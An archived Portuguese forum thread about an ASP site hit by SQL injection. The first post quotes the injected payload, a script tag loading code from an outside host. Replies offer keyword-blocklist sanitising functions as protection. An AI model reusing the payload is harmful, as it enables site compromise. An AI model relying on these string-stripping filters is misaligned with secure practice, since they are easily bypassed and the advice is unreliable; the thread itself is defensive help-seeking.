Ir para conteúdo

Arquivado

Este tópico foi arquivado e está fechado para novas respostas.

Creedence

Falha no codigo ASP

Recommended Posts

Boa tarde !

Uma falha em codigo asp em algumas páginas me parece ter permitido que fossem inseridos dados em algumas tabelas.

Já estou verificando onde pode haver o erro pra restaurar meu backup com mais segurança.

Minha duvida é se alguem já foi vitima ou sabe o que pode ocorrer quando é inserido o codigo abaixo num campo nvarchar:

 

"></title><script src="http://lilupophilupop.com/sl.php"></script>

 

Obrigado,

 

Creedence

Compartilhar este post


Link para o post
Compartilhar em outros sites

Boa tarde !

Uma falha em codigo asp em algumas páginas me parece ter permitido que fossem inseridos dados em algumas tabelas.

 

Uma falha em código asp mas qual foi a falha ? :natalsad:

Dados em algumas tabelas quais tabelas ? :natalsad:

 

Já estou verificando onde pode haver o erro pra restaurar meu backup com mais segurança.

Minha duvida é se alguém já foi vitima ou sabe o que pode ocorrer quando é inserido o codigo abaixo num campo nvarchar:

 

"></title><script src="http://lilupophilupop.com/sl.php"></script>'>http://lilupophilupop.com/sl.php"></script>

 

Obrigado,

 

Creedence

Não aconteceria nada pois nvarchar é um campo string só ficaria armazenado o código html no banco de dados, a não ser que o link http://lilupophilupop.com/sl.php tenha algum script malicioso, então se você pegar esses dados do banco de dados e der um Response.Write(recordset(nomedocampo)) pode haver algum problema, pois o código html scritp src executa páginas.

Até mais.

Compartilhar este post


Link para o post
Compartilhar em outros sites

verifique se não esta sndo alvo de SQLInjection

Compartilhar este post


Link para o post
Compartilhar em outros sites

Usa essa Função que já minimiza esse problema de injeção.

variavel = LimpaLixo(Request.Form("xxxxxxxx"))

 

' Remove caracteres que podem ser usados para injeção SQL
Function LimpaLixo(input)
   dim lixo
   dim textoOK

   lixo = array ("select", "drop", ";", "--", "insert", "delete", "xp_")
   textoOK = input
   for i = 0 to uBound(lixo)
   	textoOK = replace(textoOK,lixo(i),"")
   next

LimpaLixo = textoOK

end Function

Compartilhar este post


Link para o post
Compartilhar em outros sites

Boa tarde !

Respondendo a todos:

 

Daniel1: A falha de código que me refiro é em alguma pagina que recebe parametro não fecharmos a possibilidade de injeção de sql. As tabelas, são tabelas do meu banco onde foram inseridos códigos maliciosos por conta dessa brecha. O script direcionava sim para sites indesejados ao acessar o nosso domínio.

 

Xanburzum: O problema é esse mesmo : Injeção de SQL

 

Luizcarlos5046: Eu utilizo uma função para filtras os parâmetros. Mas acho que vacilamos em alguma ou algumas paginas o que permitiu essa entrada de script.

 

Se pesquisar no google esse script, vai aparecer um monte de sites que provavelmente também foram vítimas.

 

Obrigado,

 

Creedence

Compartilhar este post


Link para o post
Compartilhar em outros sites

sempre uso essa função para esse tipo de ataque

 

Function SafeSQL(sInput)
 TempString = sInput
 'sBadChars=array("select", "drop", ";", "--", "insert", "delete", "xp_", "#", "%", "&", "'", "(", ")", "/", "\", ":", ";", "<", ">", "=", "[", "]", "?", "`", "|") 
 sBadChars=array("select", "drop", ";", "--", "insert", "delete", "xp_", "#", "%", "&", "'", "(", ")", ":", ";", "<", ">", "=", "[", "]", "?", "`", "|") 
 For iCounter = 0 to uBound(sBadChars)
   TempString = replace(TempString,sBadChars(iCounter),"")
 Next
 SafeSQL = TempString
End function

Compartilhar este post


Link para o post
Compartilhar em outros sites

Outra coisa que costumo usar nas paginas que fazem a inserção de dados vindos de forms é o uso de sessões.

Eu faço uma verificação no topo pra ver se tem a sessão criada para o site permitir a execução... senão redireciono pra outro link.

 

Eu também não usava esses tipos de filtros pra evitar isso.

Após alguns ataques em sites de meus clientes, percebi que é necessário todo tipo de segurança.

 

Boa sorte !

Compartilhar este post


Link para o post
Compartilhar em outros sites

dá uma olhada na seção de artigos ou no lab. de script que tem um tópico de como otimizar seu code, pode te ajudar também

Compartilhar este post


Link para o post
Compartilhar em outros sites

×

Informação importante

Ao usar o fórum, você concorda com nossos Termos e condições.